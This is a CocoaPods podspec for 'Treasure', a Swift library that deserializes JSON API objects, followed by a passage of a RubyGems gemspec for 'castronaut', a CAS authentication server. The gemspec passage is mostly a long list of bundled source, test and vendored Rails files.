s.ios.deployment_target = '8.0'
s.osx.deployment_target = "10.10"
s.tvos.deployment_target = "9.0"
s.watchos.deployment_target = "2.0"
s.source_files = 'Treasure/Classes/**/*'
s.dependency 'ModelMapper', '~> 6.0.0'
end
Increase version number
Pod::Spec.new do |s|
s.name = 'Treasure'
s.version = '0.1.3'
s.summary = 'A small set of tools for deserializing JSON API objects.'
s.description = <<-DESC
Treasure is a small set of tools on top of Lyft's Mapper library to convert objects according to the JSON API specification.
DESC
s.homepage = 'https://github.com/fishermenlabs/Treasure'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'kfweber' => 'kevinw@fishermenlabs.com' }
s.source = { :git => 'https://github.com/fishermenlabs/Treasure.git', :tag => s.version.to_s }
s.ios.deployment_target = '8.0'
s.osx.deployment_target = "10.10"
s.tvos.deployment_target = "9.0"
s.watchos.deployment_target = "2.0"
s.source_files = 'Treasure/Classes/**/*'
s.dependency 'ModelMapper', '~> 6.0.0'
end
|
# -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
s.name = %q{castronaut}
s.version = "0.7.2"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.authors = ["Relevance, Inc."]
s.date = %q{2009-05-22}
s.default_executable = %q{castronaut}
s.description = %q{Your friendly, cigar smoking authentication dicator... From Space!}
s.email = %q{aaron@thinkrelevance.com}
s.executables = ["castronaut"]
s.files = [
"MIT-LICENSE",
"README.textile",
"Rakefile",
"app/config.rb",
"app/config.ru",
"app/controllers/application.rb",
"app/public/javascripts/application.js",
"app/public/javascripts/jquery.js",
"app/public/stylesheets/screen.css",
"app/views/layout.erb",
"app/views/login.erb",
"app/views/logout.erb",
"app/views/proxy_validate.erb",
"app/views/service_validate.erb",
"bin/castronaut",
"castronaut.rb",
"config/castronaut.example.yml",
"config/castronaut.sample.yml",
"config/nginx_vhost.conf",
"config/thin_config.yml",
"lib/castronaut.rb",
"lib/castronaut/adapters.rb",
"lib/castronaut/adapters/development/adapter.rb",
"lib/castronaut/adapters/development/user.rb",
"lib/castronaut/adapters/ldap/adapter.rb",
"lib/castronaut/adapters/ldap/user.rb",
"lib/castronaut/adapters/restful_authentication/adapter.rb",
"lib/castronaut/adapters/restful_authentication/user.rb",
"lib/castronaut/authentication_result.rb",
"lib/castronaut/configuration.rb",
"lib/castronaut/db/001_create_cas_database.rb",
"lib/castronaut/models/consumeable.rb",
"lib/castronaut/models/dispenser.rb",
"lib/castronaut/models/login_ticket.rb",
"lib/castronaut/models/proxy_granting_ticket.rb",
"lib/castronaut/models/proxy_ticket.rb",
"lib/castronaut/models/service_ticket.rb",
"lib/castronaut/models/ticket_granting_ticket.rb",
"lib/castronaut/presenters/login.rb",
"lib/castronaut/presenters/logout.rb",
"lib/castronaut/presenters/process_login.rb",
"lib/castronaut/presenters/proxy_validate.rb",
"lib/castronaut/presenters/service_validate.rb",
"lib/castronaut/support/sample.rb",
"lib/castronaut/ticket_result.rb",
"lib/castronaut/utilities/random_string.rb",
"spec/app/controllers/application_spec.rb",
"spec/castronaut/adapters/development/adapter_spec.rb",
"spec/castronaut/adapters/development/user_spec.rb",
"spec/castronaut/adapters/ldap/adapter_spec.rb",
"spec/castronaut/adapters/ldap/user_spec.rb",
"spec/castronaut/adapters/restful_authentication/adapter_spec.rb",
"spec/castronaut/adapters/restful_authentication/user_spec.rb",
"spec/castronaut/adapters_spec.rb",
"spec/castronaut/authentication_result_spec.rb",
"spec/castronaut/configuration_spec.rb",
"spec/castronaut/models/consumeable_spec.rb",
"spec/castronaut/models/dispenser_spec.rb",
"spec/castronaut/models/login_ticket_spec.rb",
"spec/castronaut/models/proxy_granting_ticket_spec.rb",
"spec/castronaut/models/proxy_ticket_spec.rb",
"spec/castronaut/models/service_ticket_spec.rb",
"spec/castronaut/models/ticket_granting_ticket_spec.rb",
"spec/castronaut/presenters/login_spec.rb",
"spec/castronaut/presenters/logout_spec.rb",
"spec/castronaut/presenters/process_login_spec.rb",
"spec/castronaut/presenters/proxy_validate_spec.rb",
"spec/castronaut/presenters/service_validate_spec.rb",
"spec/castronaut/ticket_result_spec.rb",
"spec/castronaut/utilities/random_string_spec.rb",
"spec/castronaut_spec.rb",
"spec/spec.opts",
"spec/spec_controller_helper.rb",
"spec/spec_helper.rb",
"spec/spec_rails_mocks.rb",
"vendor/activerecord/CHANGELOG",
"vendor/activerecord/README",
"vendor/activerecord/RUNNING_UNIT_TESTS",
"vendor/activerecord/Rakefile",
"vendor/activerecord/examples/associations.png",
"vendor/activerecord/install.rb",
"vendor/activerecord/lib/active_record.rb",
"vendor/activerecord/lib/active_record/aggregations.rb",
"vendor/activerecord/lib/active_record/association_preload.rb",
"vendor/activerecord/lib/active_record/associations.rb",
"vendor/activerecord/lib/active_record/associations/association_collection.rb",
"vendor/activerecord/lib/active_record/associations/association_proxy.rb",
"vendor/activerecord/lib/active_record/associations/belongs_to_association.rb",
"vendor/activerecord/lib/active_record/associations/belongs_to_polymorphic_association.rb",
"vendor/activerecord/lib/active_record/associations/has_and_belongs_to_many_association.rb",
"vendor/activerecord/lib/active_record/associations/has_many_association.rb",
"vendor/activerecord/lib/active_record/associations/has_many_through_association.rb",
"vendor/activerecord/lib/active_record/associations/has_one_association.rb",
"vendor/activerecord/lib/active_record/associations/has_one_through_association.rb",
"vendor/activerecord/lib/active_record/attribute_methods.rb",
"vendor/activerecord/lib/active_record/base.rb",
"vendor/activerecord/lib/active_record/calculations.rb",
"vendor/activerecord/lib/active_record/callbacks.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/connection_pool.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/connection_specification.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/database_statements.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/query_cache.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/quoting.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/schema_definitions.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract/schema_statements.rb",
"vendor/activerecord/lib/active_record/connection_adapters/abstract_adapter.rb",
"vendor/activerecord/lib/active_record/connection_adapters/mysql_adapter.rb",
"vendor/activerecord/lib/active_record/connection_adapters/postgresql_adapter.rb",
"vendor/activerecord/lib/active_record/connection_adapters/sqlite3_adapter.rb",
"vendor/activerecord/lib/active_record/connection_adapters/sqlite_adapter.rb",
"vendor/activerecord/lib/active_record/dirty.rb",
"vendor/activerecord/lib/active_record/dynamic_finder_match.rb",
"vendor/activerecord/lib/active_record/fixtures.rb",
"vendor/activerecord/lib/active_record/i18n_interpolation_deprecation.rb",
"vendor/activerecord/lib/active_record/locale/en.yml",
"vendor/activerecord/lib/active_record/locking/optimistic.rb",
"vendor/activerecord/lib/active_record/locking/pessimistic.rb",
"vendor/activerecord/lib/active_record/migration.rb",
"vendor/activerecord/lib/active_record/named_scope.rb",
"vendor/activerecord/lib/active_record/observer.rb",
"vendor/activerecord/lib/active_record/query_cache.rb",
"vendor/activerecord/lib/active_record/reflection.rb",
"vendor/activerecord/lib/active_record/schema.rb",
"vendor/activerecord/lib/active_record/schema_dumper.rb",
"vendor/activerecord/lib/active_record/serialization.rb",
"vendor/activerecord/lib/active_record/serializers/json_serializer.rb",
"vendor/activerecord/lib/active_record/serializers/xml_serializer.rb",
"vendor/activerecord/lib/active_record/test_case.rb",
"vendor/activerecord/lib/active_record/timestamp.rb",
"vendor/activerecord/lib/active_record/transactions.rb",
"vendor/activerecord/lib/active_record/validations.rb",
"vendor/activerecord/lib/active_record/version.rb",
"vendor/activerecord/lib/activerecord.rb",
"vendor/activerecord/test/assets/example.log",
"vendor/activerecord/test/assets/flowers.jpg",
"vendor/activerecord/test/cases/aaa_create_tables_test.rb",
"vendor/activerecord/test/cases/active_schema_test_mysql.rb",
"vendor/activerecord/test/cases/active_schema_test_postgresql.rb",
"vendor/activerecord/test/cases/adapter_test.rb",
"vendor/activerecord/test/cases/aggregations_test.rb",
"vendor/activerecord/test/cases/ar_schema_test.rb",
"vendor/activerecord/test/cases/associations/belongs_to_associations_test.rb",
"vendor/activerecord/test/cases/associations/callbacks_test.rb",
"vendor/activerecord/test/cases/associations/cascaded_eager_loading_test.rb",
"vendor/activerecord/test/cases/associations/eager_load_includes_full_sti_class_test.rb",
"vendor/activerecord/test/cases/associations/eager_load_nested_include_test.rb",
"vendor/activerecord/test/cases/associations/eager_singularization_test.rb",
"vendor/activerecord/test/cases/associations/eager_test.rb",
"vendor/activerecord/test/cases/associations/extension_test.rb",
"vendor/activerecord/test/cases/associations/has_and_belongs_to_many_associations_test.rb",
"vendor/activerecord/test/cases/associations/has_many_associations_test.rb",
"vendor/activerecord/test/cases/associations/has_many_through_associations_test.rb",
"vendor/activerecord/test/cases/associations/has_one_associations_test.rb",
"vendor/activerecord/test/cases/associations/has_one_through_associations_test.rb",
"vendor/activerecord/test/cases/associations/inner_join_association_test.rb",
"vendor/activerecord/test/cases/associations/join_model_test.rb",
"vendor/activerecord/test/cases/associations_test.rb",
"vendor/activerecord/test/cases/attribute_methods_test.rb",
"vendor/activerecord/test/cases/base_test.rb",
"vendor/activerecord/test/cases/binary_test.rb",
"vendor/activerecord/test/cases/calculations_test.rb",
"vendor/activerecord/test/cases/callbacks_observers_test.rb",
"vendor/activerecord/test/cases/callbacks_test.rb",
"vendor/activerecord/test/cases/class_inheritable_attributes_test.rb",
"vendor/activerecord/test/cases/column_alias_test.rb",
"vendor/activerecord/test/cases/column_definition_test.rb",
"vendor/activerecord/test/cases/connection_test_firebird.rb",
"vendor/activerecord/test/cases/connection_test_mysql.rb",
"vendor/activerecord/test/cases/copy_table_test_sqlite.rb",
"vendor/activerecord/test/cases/database_statements_test.rb",
"vendor/activerecord/test/cases/datatype_test_postgresql.rb",
"vendor/activerecord/test/cases/date_time_test.rb",
"vendor/activerecord/test/cases/default_test_firebird.rb",
"vendor/activerecord/test/cases/defaults_test.rb",
"vendor/activerecord/test/cases/deprecated_finder_test.rb",
"vendor/activerecord/test/cases/dirty_test.rb",
"vendor/activerecord/test/cases/finder_respond_to_test.rb",
"vendor/activerecord/test/cases/finder_test.rb",
"vendor/activerecord/test/cases/fixtures_test.rb",
"vendor/activerecord/test/cases/helper.rb",
"vendor/activerecord/test/cases/i18n_test.rb",
"vendor/activerecord/test/cases/inheritance_test.rb",
"vendor/activerecord/test/cases/invalid_date_test.rb",
"vendor/activerecord/test/cases/json_serialization_test.rb",
"vendor/activerecord/test/cases/lifecycle_test.rb",
"vendor/activerecord/test/cases/locking_test.rb",
"vendor/activerecord/test/cases/method_scoping_test.rb",
"vendor/activerecord/test/cases/migration_test.rb",
"vendor/activerecord/test/cases/migration_test_firebird.rb",
"vendor/activerecord/test/cases/mixin_test.rb",
"vendor/activerecord/test/cases/modules_test.rb",
"vendor/activerecord/test/cases/multiple_db_test.rb",
"vendor/activerecord/test/cases/named_scope_test.rb",
"vendor/activerecord/test/cases/pk_test.rb",
"vendor/activerecord/test/cases/pooled_connections_test.rb",
"vendor/activerecord/test/cases/query_cache_test.rb",
"vendor/activerecord/test/cases/readonly_test.rb",
"vendor/activerecord/test/cases/reflection_test.rb",
"vendor/activerecord/test/cases/reload_models_test.rb",
"vendor/activerecord/test/cases/reserved_word_test_mysql.rb",
"vendor/activerecord/test/cases/sanitize_test.rb",
"vendor/activerecord/test/cases/schema_authorization_test_postgresql.rb",
"vendor/activerecord/test/cases/schema_dumper_test.rb",
"vendor/activerecord/test/cases/schema_test_postgresql.rb",
"vendor/activerecord/test/cases/serialization_test.rb",
"vendor/activerecord/test/cases/synonym_test_oracle.rb",
"vendor/activerecord/test/cases/transactions_test.rb",
"vendor/activerecord/test/cases/unconnected_test.rb",
"vendor/activerecord/test/cases/validations_i18n_test.rb",
"vendor/activerecord/test/cases/validations_test.rb",
"vendor/activerecord/test/cases/xml_serialization_test.rb",
"vendor/activerecord/test/config.rb",
"vendor/activerecord/test/connections/native_db2/connection.rb",
"vendor/activerecord/test/connections/native_firebird/connection.rb",
"vendor/activerecord/test/connections/native_frontbase/connection.rb",
"vendor/activerecord/test/connections/native_mysql/connection.rb",
"vendor/activerecord/test/connections/native_openbase/connection.rb",
"vendor/activerecord/test/connections/native_oracle/connection.rb",
"vendor/activerecord/test/connections/native_postgresql/connection.rb",
"vendor/activerecord/test/connections/native_sqlite/connection.rb",
"vendor/activerecord/test/connections/native_sqlite3/connection.rb",
"vendor/activerecord/test/connections/native_sqlite3/in_memory_connection.rb",
"vendor/activerecord/test/connections/native_sybase/connection.rb",
"vendor/activerecord/test/fixtures/accounts.yml",
"vendor/activerecord/test/fixtures/all/developers.yml",
"vendor/activerecord/test/fixtures/all/people.csv",
"vendor/activerecord/test/fixtures/all/tasks.yml",
"vendor/activerecord/test/fixtures/author_addresses.yml",
"vendor/activerecord/test/fixtures/author_favorites.yml",
"vendor/activerecord/test/fixtures/authors.yml",
"vendor/activerecord/test/fixtures/binaries.yml",
"vendor/activerecord/test/fixtures/books.yml",
"vendor/activerecord/test/fixtures/categories.yml",
"vendor/activerecord/test/fixtures/categories/special_categories.yml",
"vendor/activerecord/test/fixtures/categories/subsubdir/arbitrary_filename.yml",
"vendor/activerecord/test/fixtures/categories_ordered.yml",
"vendor/activerecord/test/fixtures/categories_posts.yml",
"vendor/activerecord/test/fixtures/categorizations.yml",
"vendor/activerecord/test/fixtures/clubs.yml",
"vendor/activerecord/test/fixtures/comments.yml",
"vendor/activerecord/test/fixtures/companies.yml",
"vendor/activerecord/test/fixtures/computers.yml",
"vendor/activerecord/test/fixtures/courses.yml",
"vendor/activerecord/test/fixtures/customers.yml",
"vendor/activerecord/test/fixtures/developers.yml",
"vendor/activerecord/test/fixtures/developers_projects.yml",
"vendor/activerecord/test/fixtures/edges.yml",
"vendor/activerecord/test/fixtures/entrants.yml",
"vendor/activerecord/test/fixtures/fixture_database.sqlite3",
"vendor/activerecord/test/fixtures/fixture_database_2.sqlite3",
"vendor/activerecord/test/fixtures/fk_test_has_fk.yml",
"vendor/activerecord/test/fixtures/fk_test_has_pk.yml",
"vendor/activerecord/test/fixtures/funny_jokes.yml",
"vendor/activerecord/test/fixtures/items.yml",
"vendor/activerecord/test/fixtures/jobs.yml",
"vendor/activerecord/test/fixtures/legacy_things.yml",
"vendor/activerecord/test/fixtures/mateys.yml",
"vendor/activerecord/test/fixtures/members.yml",
"vendor/activerecord/test/fixtures/memberships.yml",
"vendor/activerecord/test/fixtures/minimalistics.yml",
"vendor/activerecord/test/fixtures/mixed_case_monkeys.yml",
"vendor/activerecord/test/fixtures/mixins.yml",
"vendor/activerecord/test/fixtures/movies.yml",
"vendor/activerecord/test/fixtures/naked/csv/accounts.csv",
"vendor/activerecord/test/fixtures/naked/yml/accounts.yml",
"vendor/activerecord/test/fixtures/naked/yml/companies.yml",
"vendor/activerecord/test/fixtures/naked/yml/courses.yml",
"vendor/activerecord/test/fixtures/organizations.yml",
"vendor/activerecord/test/fixtures/owners.yml",
"vendor/activerecord/test/fixtures/parrots.yml",
"vendor/activerecord/test/fixtures/parrots_pirates.yml",
"vendor/activerecord/test/fixtures/people.yml",
"vendor/activerecord/test/fixtures/pets.yml",
"vendor/activerecord/test/fixtures/pirates.yml",
"vendor/activerecord/test/fixtures/posts.yml",
"vendor/activerecord/test/fixtures/price_estimates.yml",
"vendor/activerecord/test/fixtures/projects.yml",
"vendor/activerecord/test/fixtures/readers.yml",
"vendor/activerecord/test/fixtures/references.yml",
"vendor/activerecord/test/fixtures/reserved_words/distinct.yml",
"vendor/activerecord/test/fixtures/reserved_words/distincts_selects.yml",
"vendor/activerecord/test/fixtures/reserved_words/group.yml",
"vendor/activerecord/test/fixtures/reserved_words/select.yml",
"vendor/activerecord/test/fixtures/reserved_words/values.yml",
"vendor/activerecord/test/fixtures/ships.yml",
"vendor/activerecord/test/fixtures/sponsors.yml",
"vendor/activerecord/test/fixtures/subscribers.yml",
"vendor/activerecord/test/fixtures/subscriptions.yml",
"vendor/activerecord/test/fixtures/taggings.yml",
"vendor/activerecord/test/fixtures/tags.yml",
"vendor/activerecord/test/fixtures/tasks.yml",
"vendor/activerecord/test/fixtures/topics.yml",
"vendor/activerecord/test/fixtures/treasures.yml",
"vendor/activerecord/test/fixtures/vertices.yml",
"vendor/activerecord/test/fixtures/warehouse-things.yml",
"vendor/activerecord/test/migrations/broken/100_migration_that_raises_exception.rb",
"vendor/activerecord/test/migrations/decimal/1_give_me_big_numbers.rb",
"vendor/activerecord/test/migrations/duplicate/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/duplicate/2_we_need_reminders.rb",
"vendor/activerecord/test/migrations/duplicate/3_foo.rb",
"vendor/activerecord/test/migrations/duplicate/3_innocent_jointable.rb",
"vendor/activerecord/test/migrations/duplicate_names/20080507052938_chunky.rb",
"vendor/activerecord/test/migrations/duplicate_names/20080507053028_chunky.rb",
"vendor/activerecord/test/migrations/interleaved/pass_1/3_innocent_jointable.rb",
"vendor/activerecord/test/migrations/interleaved/pass_2/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/interleaved/pass_2/3_innocent_jointable.rb",
"vendor/activerecord/test/migrations/interleaved/pass_3/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/interleaved/pass_3/2_i_raise_on_down.rb",
"vendor/activerecord/test/migrations/interleaved/pass_3/3_innocent_jointable.rb",
"vendor/activerecord/test/migrations/missing/1000_people_have_middle_names.rb",
"vendor/activerecord/test/migrations/missing/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/missing/3_we_need_reminders.rb",
"vendor/activerecord/test/migrations/missing/4_innocent_jointable.rb",
"vendor/activerecord/test/migrations/valid/1_people_have_last_names.rb",
"vendor/activerecord/test/migrations/valid/2_we_need_reminders.rb",
"vendor/activerecord/test/migrations/valid/3_innocent_jointable.rb",
"vendor/activerecord/test/models/author.rb",
"vendor/activerecord/test/models/auto_id.rb",
"vendor/activerecord/test/models/binary.rb",
"vendor/activerecord/test/models/book.rb",
"vendor/activerecord/test/models/categorization.rb",
"vendor/activerecord/test/models/category.rb",
"vendor/activerecord/test/models/citation.rb",
"vendor/activerecord/test/models/club.rb",
"vendor/activerecord/test/models/column_name.rb",
"vendor/activerecord/test/models/comment.rb",
"vendor/activerecord/test/models/company.rb",
"vendor/activerecord/test/models/company_in_module.rb",
"vendor/activerecord/test/models/computer.rb",
"vendor/activerecord/test/models/contact.rb",
"vendor/activerecord/test/models/course.rb",
"vendor/activerecord/test/models/customer.rb",
"vendor/activerecord/test/models/default.rb",
"vendor/activerecord/test/models/developer.rb",
"vendor/activerecord/test/models/edge.rb",
"vendor/activerecord/test/models/entrant.rb",
"vendor/activerecord/test/models/guid.rb",
"vendor/activerecord/test/models/item.rb",
"vendor/activerecord/test/models/job.rb",
"vendor/activerecord/test/models/joke.rb",
"vendor/activerecord/test/models/keyboard.rb",
"vendor/activerecord/test/models/legacy_thing.rb",
"vendor/activerecord/test/models/matey.rb",
"vendor/activerecord/test/models/member.rb",
"vendor/activerecord/test/models/member_detail.rb",
"vendor/activerecord/test/models/membership.rb",
"vendor/activerecord/test/models/minimalistic.rb",
"vendor/activerecord/test/models/mixed_case_monkey.rb",
"vendor/activerecord/test/models/movie.rb",
"vendor/activerecord/test/models/order.rb",
"vendor/activerecord/test/models/organization.rb",
"vendor/activerecord/test/models/owner.rb",
"vendor/activerecord/test/models/parrot.rb",
"vendor/activerecord/test/models/person.rb",
"vendor/activerecord/test/models/pet.rb",
"vendor/activerecord/test/models/pirate.rb",
"vendor/activerecord/test/models/post.rb",
"vendor/activerecord/test/models/price_estimate.rb",
"vendor/activerecord/test/models/project.rb",
"vendor/activerecord/test/models/reader.rb",
"vendor/activerecord/test/models/reference.rb",
"vendor/activerecord/test/models/reply.rb",
"vendor/activerecord/test/models/ship.rb",
"vendor/activerecord/test/models/sponsor.rb",
"vendor/activerecord/test/models/subject.rb",
"vendor/activerecord/test/models/subscriber.rb",
"vendor/activerecord/test/models/subscription.rb",
"vendor/activerecord/test/models/tag.rb",
"vendor/activerecord/test/models/tagging.rb",
"vendor/activerecord/test/models/task.rb",
"vendor/activerecord/test/models/topic.rb",
"vendor/activerecord/test/models/treasure.rb",
"vendor/activerecord/test/models/vertex.rb",
"vendor/activerecord/test/models/warehouse_thing.rb",
"vendor/activerecord/test/schema/mysql_specific_schema.rb",
"vendor/activerecord/test/schema/postgresql_specific_schema.rb",
"vendor/activerecord/test/schema/schema.rb",
"vendor/activerecord/test/schema/schema2.rb",
"vendor/activerecord/test/schema/sqlite_specific_schema.rb",
"vendor/activesupport/CHANGELOG",
"vendor/activesupport/README",
"vendor/activesupport/lib/active_support.rb",
"vendor/activesupport/lib/active_support/base64.rb",
"vendor/activesupport/lib/active_support/basic_object.rb",
"vendor/activesupport/lib/active_support/buffered_logger.rb",
"vendor/activesupport/lib/active_support/cache.rb",
"vendor/activesupport/lib/active_support/cache/compressed_mem_cache_store.rb",
"vendor/activesupport/lib/active_support/cache/drb_store.rb",
"vendor/activesupport/lib/active_support/cache/file_store.rb",
"vendor/activesupport/lib/active_support/cache/mem_cache_store.rb",
"vendor/activesupport/lib/active_support/cache/memory_store.rb",
"vendor/activesupport/lib/active_support/cache/synchronized_memory_store.rb",
"vendor/activesupport/lib/active_support/callbacks.rb",
"vendor/activesupport/lib/active_support/core_ext.rb",
"vendor/activesupport/lib/active_support/core_ext/array.rb",
"vendor/activesupport/lib/active_support/core_ext/array/access.rb",
"vendor/activesupport/lib/active_support/core_ext/array/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/array/extract_options.rb",
"vendor/activesupport/lib/active_support/core_ext/array/grouping.rb",
"vendor/activesupport/lib/active_support/core_ext/array/random_access.rb",
"vendor/activesupport/lib/active_support/core_ext/base64.rb",
"vendor/activesupport/lib/active_support/core_ext/base64/encoding.rb",
"vendor/activesupport/lib/active_support/core_ext/benchmark.rb",
"vendor/activesupport/lib/active_support/core_ext/bigdecimal.rb",
"vendor/activesupport/lib/active_support/core_ext/bigdecimal/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/blank.rb",
"vendor/activesupport/lib/active_support/core_ext/cgi.rb",
"vendor/activesupport/lib/active_support/core_ext/cgi/escape_skipping_slashes.rb",
"vendor/activesupport/lib/active_support/core_ext/class.rb",
"vendor/activesupport/lib/active_support/core_ext/class/attribute_accessors.rb",
"vendor/activesupport/lib/active_support/core_ext/class/delegating_attributes.rb",
"vendor/activesupport/lib/active_support/core_ext/class/inheritable_attributes.rb",
"vendor/activesupport/lib/active_support/core_ext/class/removal.rb",
"vendor/activesupport/lib/active_support/core_ext/date.rb",
"vendor/activesupport/lib/active_support/core_ext/date/behavior.rb",
"vendor/activesupport/lib/active_support/core_ext/date/calculations.rb",
"vendor/activesupport/lib/active_support/core_ext/date/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/date_time.rb",
"vendor/activesupport/lib/active_support/core_ext/date_time/calculations.rb",
"vendor/activesupport/lib/active_support/core_ext/date_time/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/duplicable.rb",
"vendor/activesupport/lib/active_support/core_ext/enumerable.rb",
"vendor/activesupport/lib/active_support/core_ext/exception.rb",
"vendor/activesupport/lib/active_support/core_ext/file.rb",
"vendor/activesupport/lib/active_support/core_ext/file/atomic.rb",
"vendor/activesupport/lib/active_support/core_ext/float.rb",
"vendor/activesupport/lib/active_support/core_ext/float/rounding.rb",
"vendor/activesupport/lib/active_support/core_ext/float/time.rb",
"vendor/activesupport/lib/active_support/core_ext/hash.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/deep_merge.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/diff.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/except.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/indifferent_access.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/keys.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/reverse_merge.rb",
"vendor/activesupport/lib/active_support/core_ext/hash/slice.rb",
"vendor/activesupport/lib/active_support/core_ext/integer.rb",
"vendor/activesupport/lib/active_support/core_ext/integer/even_odd.rb",
"vendor/activesupport/lib/active_support/core_ext/integer/inflections.rb",
"vendor/activesupport/lib/active_support/core_ext/integer/time.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/agnostics.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/daemonizing.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/debugger.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/reporting.rb",
"vendor/activesupport/lib/active_support/core_ext/kernel/requires.rb",
"vendor/activesupport/lib/active_support/core_ext/load_error.rb",
"vendor/activesupport/lib/active_support/core_ext/logger.rb",
"vendor/activesupport/lib/active_support/core_ext/module.rb",
"vendor/activesupport/lib/active_support/core_ext/module/aliasing.rb",
"vendor/activesupport/lib/active_support/core_ext/module/attr_accessor_with_default.rb",
"vendor/activesupport/lib/active_support/core_ext/module/attr_internal.rb",
"vendor/activesupport/lib/active_support/core_ext/module/attribute_accessors.rb",
"vendor/activesupport/lib/active_support/core_ext/module/delegation.rb",
"vendor/activesupport/lib/active_support/core_ext/module/inclusion.rb",
"vendor/activesupport/lib/active_support/core_ext/module/introspection.rb",
"vendor/activesupport/lib/active_support/core_ext/module/loading.rb",
"vendor/activesupport/lib/active_support/core_ext/module/model_naming.rb",
"vendor/activesupport/lib/active_support/core_ext/module/synchronization.rb",
"vendor/activesupport/lib/active_support/core_ext/name_error.rb",
"vendor/activesupport/lib/active_support/core_ext/numeric.rb",
"vendor/activesupport/lib/active_support/core_ext/numeric/bytes.rb",
"vendor/activesupport/lib/active_support/core_ext/numeric/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/numeric/time.rb",
"vendor/activesupport/lib/active_support/core_ext/object.rb",
"vendor/activesupport/lib/active_support/core_ext/object/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/object/extending.rb",
"vendor/activesupport/lib/active_support/core_ext/object/instance_variables.rb",
"vendor/activesupport/lib/active_support/core_ext/object/metaclass.rb",
"vendor/activesupport/lib/active_support/core_ext/object/misc.rb",
"vendor/activesupport/lib/active_support/core_ext/pathname.rb",
"vendor/activesupport/lib/active_support/core_ext/pathname/clean_within.rb",
"vendor/activesupport/lib/active_support/core_ext/proc.rb",
"vendor/activesupport/lib/active_support/core_ext/process.rb",
"vendor/activesupport/lib/active_support/core_ext/process/daemon.rb",
"vendor/activesupport/lib/active_support/core_ext/range.rb",
"vendor/activesupport/lib/active_support/core_ext/range/blockless_step.rb",
"vendor/activesupport/lib/active_support/core_ext/range/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/range/include_range.rb",
"vendor/activesupport/lib/active_support/core_ext/range/overlaps.rb",
"vendor/activesupport/lib/active_support/core_ext/rexml.rb",
"vendor/activesupport/lib/active_support/core_ext/string.rb",
"vendor/activesupport/lib/active_support/core_ext/string/access.rb",
"vendor/activesupport/lib/active_support/core_ext/string/behavior.rb",
"vendor/activesupport/lib/active_support/core_ext/string/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/string/filters.rb",
"vendor/activesupport/lib/active_support/core_ext/string/inflections.rb",
"vendor/activesupport/lib/active_support/core_ext/string/iterators.rb",
"vendor/activesupport/lib/active_support/core_ext/string/multibyte.rb",
"vendor/activesupport/lib/active_support/core_ext/string/starts_ends_with.rb",
"vendor/activesupport/lib/active_support/core_ext/string/xchar.rb",
"vendor/activesupport/lib/active_support/core_ext/symbol.rb",
"vendor/activesupport/lib/active_support/core_ext/time.rb",
"vendor/activesupport/lib/active_support/core_ext/time/behavior.rb",
"vendor/activesupport/lib/active_support/core_ext/time/calculations.rb",
"vendor/activesupport/lib/active_support/core_ext/time/conversions.rb",
"vendor/activesupport/lib/active_support/core_ext/time/zones.rb",
"vendor/activesupport/lib/active_support/dependencies.rb",
"vendor/activesupport/lib/active_support/deprecation.rb",
"vendor/activesupport/lib/active_support/duration.rb",
"vendor/activesupport/lib/active_support/gzip.rb",
"vendor/activesupport/lib/active_support/inflections.rb",
"vendor/activesupport/lib/active_support/inflector.rb",
"vendor/activesupport/lib/active_support/json.rb",
"vendor/activesupport/lib/active_support/json/decoding.rb",
"vendor/activesupport/lib/active_support/json/encoders/date.rb",
"vendor/activesupport/lib/active_support/json/encoders/date_time.rb",
"vendor/activesupport/lib/active_support/json/encoders/enumerable.rb",
"vendor/activesupport/lib/active_support/json/encoders/false_class.rb",
"vendor/activesupport/lib/active_support/json/encoders/hash.rb",
"vendor/activesupport/lib/active_support/json/encoders/nil_class.rb",
"vendor/activesupport/lib/active_support/json/encoders/numeric.rb",
"vendor/activesupport/lib/active_support/json/encoders/object.rb",
"vendor/activesupport/lib/active_support/json/encoders/regexp.rb",
"vendor/activesupport/lib/active_support/json/encoders/string.rb",
"vendor/activesupport/lib/active_support/json/encoders/symbol.rb",
"vendor/activesupport/lib/active_support/json/encoders/time.rb",
"vendor/activesupport/lib/active_support/json/encoders/true_class.rb",
"vendor/activesupport/lib/active_support/json/encoding.rb",
"vendor/activesupport/lib/active_support/json/variable.rb",
"vendor/activesupport/lib/active_support/locale/en.yml",
"vendor/activesupport/lib/active_support/memoizable.rb",
"vendor/activesupport/lib/active_support/multibyte.rb",
"vendor/activesupport/lib/active_support/multibyte/chars.rb",
"vendor/activesupport/lib/active_support/multibyte/exceptions.rb",
"vendor/activesupport/lib/active_support/multibyte/unicode_database.rb",
"vendor/activesupport/lib/active_support/option_merger.rb",
"vendor/activesupport/lib/active_support/ordered_hash.rb",
